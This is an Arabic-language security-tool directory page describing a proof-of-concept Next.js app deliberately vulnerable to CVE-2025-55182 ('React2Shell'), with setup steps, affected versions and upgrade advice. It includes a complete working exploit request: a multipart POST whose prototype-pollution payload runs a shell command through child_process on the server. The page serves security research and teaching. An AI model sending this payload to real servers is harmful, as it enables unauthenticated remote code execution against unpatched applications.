Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
NextJS-app-CVE-2025-55182 — تطبيق إثبات المفهوم يوضح ثغرة CVE-2025-55182 (React2Shell) RCE في مكونات خادم React. للاستخدام في البحث الأمني والاختبار التعليمي فقط في بيئات معزولة. | Kitploit
أدوات/GitHubGitHub/s-mughal/nextjs-app-cve-2025-55182
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubs-mughal/nextjs-app-cve-2025-55182

NextJS-app-CVE-2025-55182

تطبيق إثبات المفهوم يوضح ثغرة CVE-2025-55182 (React2Shell) RCE في مكونات خادم React. للاستخدام في البحث الأمني والاختبار التعليمي فقط في بيئات معزولة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

إثبات المفهوم لـ Next.js CVE-2025-55182

هذا تطبيق Next.js إثبات لمفهوم معرض لثغرة CVE-2025-55182 (المعروفة أيضًا باسم "React2Shell")، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في مكونات خادم React.

⚠️ تحذير

هذا التطبيق معرض عمدًا ويجب استخدامه فقط من أجل:

  • البحث الأمني
  • الأغراض التعليمية
  • الاختبار في بيئات معزولة

لا تفعل:

  • النشر في بيئة الإنتاج
  • التعرض لشبكات غير موثوقة
  • الاستخدام مع بيانات حساسة

تفاصيل الثغرة

تؤثر CVE-2025-55182 على:

  • إصدارات React من 19.0.0 حتى 19.2.0
  • إصدارات Next.js 15.x و 16.x (باستخدام App Router)
  • التطبيقات التي تستخدم مكونات خادم React (RSC)

تنشأ الثغرة من إلغاء التسلسل غير الآمن في معالجة حمولة مكونات خادم React، مما يسمح للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عشوائية على الخادم عبر طلبات HTTP مصممة خصيصًا.

تعليمات الإعداد

الخيار 1: التطوير المحلي

  1. تثبيت التبعيات:

    root@kitploit:~
    npm install
    
  2. تشغيل خادم التطوير:

    root@kitploit:~
    npm run dev
    
  3. الوصول إلى التطبيق: افتح http://localhost:3000 في متصفحك.

الخيار 2: Docker

  1. بناء صورة Docker:

    root@kitploit:~
    docker build -t nextjs-cve-2025-55182 .
    
  2. تشغيل الحاوية:

    root@kitploit:~
    docker run --rm -p 3000:3000 nextjs-cve-2025-55182
    
  3. الوصول إلى التطبيق: افتح http://localhost:3000 في متصفحك.

هيكل التطبيق

  • صفحة تسجيل الدخول (/): نموذج تسجيل دخول بسيط باستخدام مكونات خادم React
  • لوحة التحكم (/dashboard): صفحة محمية يمكن الوصول إليها بعد تسجيل الدخول

المكونات المعرضة للخطر

يستخدم هذا التطبيق:

  • Next.js 15.1.0 (إصدار معرض)
  • React 19.0.0 (إصدار معرض)
  • App Router مع مكونات خادم React (RSC)
  • هيكل create-next-app الأساسي

توجد الثغرة في آلية إلغاء تسلسل حمولة RSC، والتي يمكن استغلالها عن طريق إرسال طلبات HTTP متعددة الأجزاء ضارة مباشرة إلى مسارات الصفحات (مثل http://localhost:3000 أو http://localhost:3000/dashboard). يعمل الاستغلال على أي صفحة تستخدم مكونات خادم React.

الاستغلال

يمكن استغلال الثغرة عن طريق إرسال طلبات HTTP مصممة خصيصًا مباشرة إلى مسارات الصفحات (مثل http://localhost:3000 أو http://localhost:3000/dashboard). يعمل الاستغلال على أي صفحة تستخدم مكونات خادم React.

مثال سريع للاستغلال

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

يستهدف الاستغلال مسارات الصفحات مباشرة - يعمل على localhost:3000 (الصفحة الرئيسية) أو localhost:3000/dashboard (صفحة لوحة التحكم).

التخفيف

لإصلاح هذه الثغرة:

  • ترقية React إلى الإصدار 19.0.1 أو 19.1.2 أو 19.2.1+
  • ترقية Next.js إلى إصدار مصحح (15.0.5+ أو 16.x مع التصحيحات)

المراجع

  • CVE-2025-55182
  • تنبيه أمني من React
  • تنبيه أمني من Next.js

الترخيص

يتم توفير إثبات المفهوم هذا للأغراض التعليمية والبحث الأمني فقط.

تنزيل الأداة